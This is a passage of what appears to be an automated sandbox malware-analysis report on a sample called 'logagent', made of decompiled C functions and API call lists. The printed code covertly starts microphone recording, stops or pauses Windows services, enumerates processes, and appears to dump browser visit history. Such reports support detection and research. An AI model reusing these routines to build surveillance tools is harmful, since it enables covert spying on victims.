                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                    • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                    • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                    • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                    • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                  • String ID:
                                  • API String ID: 573486607-0
                                  • Opcode ID: aa66e4f5bf8f0b9d55fb22090a090fc99bfa328d692b576d190f675996a42e8d
                                  • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                  • Opcode Fuzzy Hash: aa66e4f5bf8f0b9d55fb22090a090fc99bfa328d692b576d190f675996a42e8d
                                  • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DBD7 Relevance: 12.0, APIs: 8, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E0040DBD7() {
				char* _t7;
				int _t8;
				char* _t9;
				int _t10;
				char* _t11;
				void* _t33;
				void* _t40;

				 *0x41b1f8 = 0;
				_t7 = E0040180C(_t33 - 0x10, 0, 2);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t8 = atoi(_t7);
				_t9 = E0040180C(_t33 - 0x10, 0, 1);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t10 = atoi(_t9);
				_t11 = E0040180C(_t33 - 0x10, 0, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E004010CE(_t40, atoi(_t11), _t10, _t8);
				E004017DD(_t33 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}










                                  0x0040dbde
                                  0x0040dbe4
                                  0x0040dbeb
                                  0x0040dbf8
                                  0x0040dc01
                                  0x0040dc08
                                  0x0040dc0f
                                  0x0040dc17
                                  0x0040dc1e
                                  0x0040dc29
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040DBEB
                                  • atoi.MSVCRT ref: 0040DBF8
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040DC08
                                  • atoi.MSVCRT ref: 0040DC0F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DC1E
                                  • atoi.MSVCRT ref: 0040DC25
                                    • Part of subcall function 004010CE: _ftol.MSVCRT ref: 00401134
                                    • Part of subcall function 004010CE: waveInOpen.WINMM(0041B198,000000FF,0041B218,0040122D,00000000,00030008), ref: 0040115E
                                    • Part of subcall function 004010CE: waveInStart.WINMM ref: 00401177
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@wave$OpenStart_ftol
                                  • String ID:
                                  • API String ID: 463581448-0
                                  • Opcode ID: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                  • Instruction ID: c3a8f3133f02346e86bcb6311be1634d36dcbe797283f91724418690e0411b93
                                  • Opcode Fuzzy Hash: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                  • Instruction Fuzzy Hash: 1D01FF72E00218DFDB04BBF1EC599ED7764EB90356B00483EE512E71E1EEB85904CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411859 Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00411859(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                  0x00411862
                                  0x00411868
                                  0x00411873
                                  0x00411875
                                  0x00411883
                                  0x00411887
                                  0x004118a8
                                  0x004118ab
                                  0x004118ae
                                  0x00411889
                                  0x0041188a
                                  0x0041188a
                                  0x004118b3
                                  0x004118bf

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                  • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004118C0 Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004118C0(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                  0x004118c9
                                  0x004118cf
                                  0x004118da
                                  0x004118dc
                                  0x004118ea
                                  0x004118ee
                                  0x0041190f
                                  0x00411912
                                  0x00411915
                                  0x004118f0
                                  0x004118f1
                                  0x004118f1
                                  0x0041191a
                                  0x00411926

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                  • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411760 Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00411760(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x20);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x20);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                  0x00411769
                                  0x0041176f
                                  0x0041177a
                                  0x0041177c
                                  0x0041178a
                                  0x0041178e
                                  0x004117af
                                  0x004117b2
                                  0x004117b5
                                  0x00411790
                                  0x00411791
                                  0x00411791
                                  0x004117ba
                                  0x004117c6

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,00411280), ref: 0041176F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,00411280), ref: 0041177C
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411280), ref: 00411784
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 00411791
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B2
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411280), ref: 004117BA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction ID: b89de82e4dcd107d12e5f2e386de490b738cfb46e6195f9b9e1884d6b0831d1c
                                  • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction Fuzzy Hash: 23F0AF71100618EFD3106FB4AC88EFF3F6CEF89390B044025FA06921A0DB648D468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D761 Relevance: 12.0, APIs: 8, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 43%
                                  			E0040D761(void* __ecx, void* __eflags) {
				void* _t15;
				void* _t20;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t38;

				_t38 = __eflags;
				_t20 = __ecx;
				__imp___itoa(GetCurrentProcessId(), _t32 - 0x30, 0xa);
				_t15 = _t32 - 0x60;
				L00414140();
				L00414170();
				E004020C2(0x41be70, 0x4f, _t34);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t15, _t15, E00409EAA(_t38, _t32 - 0x150), _t30, _t32 - 0x30, _t20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				E004017DD(_t32 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}









                                  0x0040d761
                                  0x0040d761
                                  0x0040d76e
                                  0x0040d78a
                                  0x0040d78e
                                  0x0040d798
                                  0x0040d7a7
                                  0x0040d7af
                                  0x0040e69b
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D767
                                  • _itoa.MSVCRT ref: 0040D76E
                                    • Part of subcall function 00409EAA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00409EAA: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409ECF
                                    • Part of subcall function 00409EAA: Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                    • Part of subcall function 00409EAA: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                    • Part of subcall function 00409EAA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D78E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D798
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D7AF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                  • String ID:
                                  • API String ID: 1707565870-0
                                  • Opcode ID: 4cae1d544470bc0af079cc07991b023f49fc002eae8bba0a66ae4c0a5993d064
                                  • Instruction ID: 286f1569ef994b2bf272d8202e8d00d479d3e157814ab9f0be6f7aa08cfd563f
                                  • Opcode Fuzzy Hash: 4cae1d544470bc0af079cc07991b023f49fc002eae8bba0a66ae4c0a5993d064
                                  • Instruction Fuzzy Hash: CD01217291021CEBCB05ABE1EC4DDEE7738FBA4306F00443AF506A7091EB745949CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041230A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90sleeplibraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0041230A(void* __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				char _v84;
				void* _t39;
				void* _t41;
				void* _t45;
				void* _t50;
				void* _t54;
				intOrPtr _t56;
				intOrPtr* _t59;

				_t56 = __edx;
				_t54 = __ecx;
				_t59 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				 *_t59( &_v44,  &_v60,  &_v76);
				Sleep(0x3e8);
				 *_t59( &_v52,  &_v68,  &_v84);
				_v28 = E004123EE(_t54,  &_v44);
				_v24 = _t56;
				_v20 = E004123EE(_t54,  &_v52);
				_v16 = _t56;
				_t39 = E004123EE(_t54,  &_v60);
				_v32 = _t56;
				_t41 = E004123EE(_t54,  &_v68);
				_v12 = E004123EE(_t54,  &_v76);
				asm("sbb edi, [ebp-0x1c]");
				_v8 = _t56;
				_v32 = _t56;
				_t45 = E004123EE(_t54,  &_v84);
				asm("sbb edi, [ebp-0x4]");
				asm("sbb ecx, [ebp-0xc]");
				asm("adc ecx, [ebp-0x1c]");
				asm("adc ecx, [ebp-0x14]");
				_t50 = E00413F70(_t45 - _v12 - _v20 + _t41 - _t39 + _v28, _t56, 0x64, 0);
				asm("adc edi, [ebp-0x1c]");
				return E00413F00(_t50, _t56, _t45 - _v12 + _t41 - _t39, _t56);
			}























                                  0x0041230a
                                  0x0041230a
                                  0x0041232a
                                  0x00412338
                                  0x0041233f
                                  0x00412351
                                  0x0041235c
                                  0x00412363
                                  0x0041236b
                                  0x00412372
                                  0x00412375
                                  0x00412380
                                  0x00412383
                                  0x00412397
                                  0x0041239a
                                  0x004123a1
                                  0x004123a6
                                  0x004123a9
                                  0x004123bc
                                  0x004123c6
                                  0x004123cb
                                  0x004123d1
                                  0x004123d6
                                  0x004123dd
                                  0x004123ed

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                  • GetProcAddress.KERNEL32(00000000), ref: 00412324
                                  • Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                  • __aulldiv.LIBCMT ref: 004123E4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProcSleep__aulldiv
                                  • String ID: GetSystemTimes$kernel32.dll
                                  • API String ID: 482274533-1354958348
                                  • Opcode ID: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
